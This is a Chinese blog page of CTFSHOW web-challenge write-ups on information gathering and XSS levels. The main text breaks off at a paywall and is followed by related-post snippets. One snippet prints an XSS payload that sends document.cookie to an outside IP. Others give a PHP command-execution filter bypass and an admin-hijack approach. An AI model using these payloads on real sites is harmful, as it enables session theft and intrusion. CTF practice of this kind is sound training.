CTFSHOW-Web入门题解(后续题目更新在主页不同的漏洞专题)

原创 已于 2024-07-17 15:32:56 修改 · 646 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #经验分享

于 2024-03-18 21:10:37 首次发布

请添加图片描述

CTFSHOW-Web入门题解(更新中)

信息收集

web1

F12查看源代码即可
在这里插入图片描述

web2

提示js前台拦截 === 无效操作
同时无法查看源代码
在这里插入图片描述
根据提示,我们禁用js。这里可以使用插件,javascript switch
在这里插入图片描述
之后刷新就能查看了
在这里插入图片描述
或者在url前拼接view-source:
在这里插入图片描述

XSS

以下题目均需要使用xss平台获取Cookie,这里为了学习演示只弹窗
这里可以看这位大佬的博客,很详细:https://veo.pub/2019/xsscode/#

web316

在这里插入图片描述
直接输入即可弹窗

web317

script标签好像被过滤了,用img
在这里插入图片描述

web318

过滤了i

最低0.47元/天 解锁文章
ctf刷题 ctfshow【网鼎杯】
weixin_44807430的博客
01-07 3603
纯粹学安全
ctfshowWeb应用安全与防护(第一章)wp
最新发布
2402_86423757的博客
09-04 2051
查看网页源代码告诉我们了password的base64,直接解码。
CTFshow-WEB入门-PHP特性(持续更新)
feng的博客
01-20 6533
web89 利用intval的这个特性: 非空的数组会返回1,因此利用数组绕过。 web90 两种方式: ?num=4476a ?num=0x117c web91 考察了preg_match的/m模式。 默认的正则开始"^“和结束”$“只是对于正则字符串如果在修饰符中加上"m”,那么开始和结束将会指字符串的每一行:每一行的开头就是"^",结尾就是"$"。 因此?cmd=php%0a1即可 web92 <?php include("flag.php"); highlight_file(__
ctfshow 每周大挑战 极限命令执行
m0_64815693的博客
02-12 4505
ctfshow 每周大挑战 极限命令执行 wp
ctfshow
PUTAOAO的博客
08-12 371
crypto2_月自圆 已知m长为71 加密后长度为142 flag在m中第53位置则在密文中105的位置刚好是salt的位置 可以爆破salt和a f ⇒ 1c l ⇒ 29 a ⇒ 56 g ⇒ 66 from itertools import * from random import * from string import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(
CTFSHOW-Web入门题解更新中)
2401_84297944的博客
04-28 410
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。根据提示,我们禁用js。这里可以使用插件,javascript switch。以下题目均需要使用xss平台获取Cookie,这里为了学习演示只弹窗。script标签好像被过滤了,用img。提示js前台拦截 === 无效操作。过滤了img和script。因篇幅有限,仅展示部分资料。F12查看源代码即可。
CTFshow-web入门-文件上传
weixin_44770698的博客
07-06 1411
CTFshow-文件上传
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种安全挑战,包括Web漏洞利用、密码学、逆向工程等。这里的"菜狗杯"可能是指比赛的昵称或名称,暗示这是一个初级到中级难度的竞赛,适合新手和进阶者参与。 ...
ctfshow web入门1-20题解
2301_80217819的博客
10-20 1138
查看源码得flag。
ctf.show
giaogiao123的博客
02-15 355
进入页面首先看到一个题目看hint ?cmd 有了源码 看大佬的笔记这是一个php短标签,正则匹配 考虑绕过 ?cmd=?><?=`/???/?p /???????? p.p`;?> 然后出现文件下载,咱也不知道为撒,反正师傅都是这么写的,让我学明白了在更。 ...
CTFShow Web 入门 XSS
tj13995958709的博客
04-14 3031
这一题用上一题的做法就不行,这一题admin的cookie是一直在变的,而且很快,看到此题还有修改密码的功能,注册个普通账号,在修改密码时抓包。当将这行脚本代码提交后,稍等片刻,会有个类似admin管理员的程序每隔一段时间就查看我们提交的连接,然后就可以拿到admin的cookie。这道题它代码逻辑有问题,转账的不扣转账方的金额,所以可以一直向自己转账,转的金额不超过自己余额即可。直接让admin转自己10000,和上题让admin自己改密码思路是一样的。然后登录admin账号,密码输入123456。
CTFshow-WEB入门-XSS
feng的博客
02-28 7146
前言 因为不太会javascript,所以对于xss的了解一直比较少,也不太会,这次做一下xss专题,学习一下xss。 web316 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! 意思是要生成链接,应该就还是获得管理员cookie这样的题目,大师傅们说题目的bot是每隔一段时间自动点击的。 可以利用xss平台: XSS平台 以后我都用自己vps。 首先测试一下<script>alert(1)</script>,弹窗成功,第一题应该是没有任何的过滤,所以直接打co
ctfshow web入门 xss篇
jie_a的博客
05-31 1023
web316-web326 首先用xss平台实验了下 没有flag,群主说要生成连接,然后后台会有个机器人点一下 呢咱们就生成连接 <input onfocus="window.open('http://121.4.162.152:8888/'+document.cookie)" autofocus> 然后用咱们的vps监听端口 然后flag 就出来了 详细绕过姿势看这个大佬博客 <body onload="window.location.href='http://121.4.16
ctfshow-web 萌新题
wangzhemvp的博客
10-09 748
spring漏洞pyload:1.发现git2.工具得到.git文件addslashes函数:在预定义的字符前面加上反斜杠%1$的作用就是防止 ' 被过滤掉输入?在Cookie里发现file,,为flag.txt把Cookie中的file赋值为,注这里抓包是响应页面的包。
ctfshow Nodejs
weixin_63231007的博客
03-08 977
承接上文nodejs原型链漏洞刷题练习
ctfshow(刷题经历)
qq_62046696的博客
06-26 1898
1、打开以后看见filename=后面感觉是一个base64编码,接着解码一下,发现等于keys.txt,通常的源文件应该是index.php2、对index.php进行base64编码并作为新的filename的参数3、查看源文件,其里line变量起到控制行数的作用: http://114.67.246.176:13972/index.php?line=1&filename=aW5kZXgucGhw发现爆出了第一行隐含的代码,4、编写python脚本,查看全部源码 这样代码就出来了下图:5、分析PH
CTFshow web1
羽的博客
02-26 6570
题目地址:https://ctf.show 扫描后台拿到源码(www.zip)。打开login.php能禁的基本都禁干净了,登录页面貌似没有注入的可能。reg.php也是如此,所以注册页面也没可能了。剩下最后一个就是显示信息的页面了。这里可以看到在数据库中是把所有的字段(包括密码)都给查出来了,但是没有显示密码的地方。 我们可以利用?order=pwd来判断注册的密码与flag用户密码的大小(...
ctfshow web34题解
04-03
CTFShow 平台中的 Web 类别题目通常涉及漏洞利用、代码审计以及安全防护机制绕过等内容。对于第34题,可以从已知的参考资料中提取关键信息并结合常见 Web 安全挑战的知识来推导解决方案。 #### 已知条件整理 1. **...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值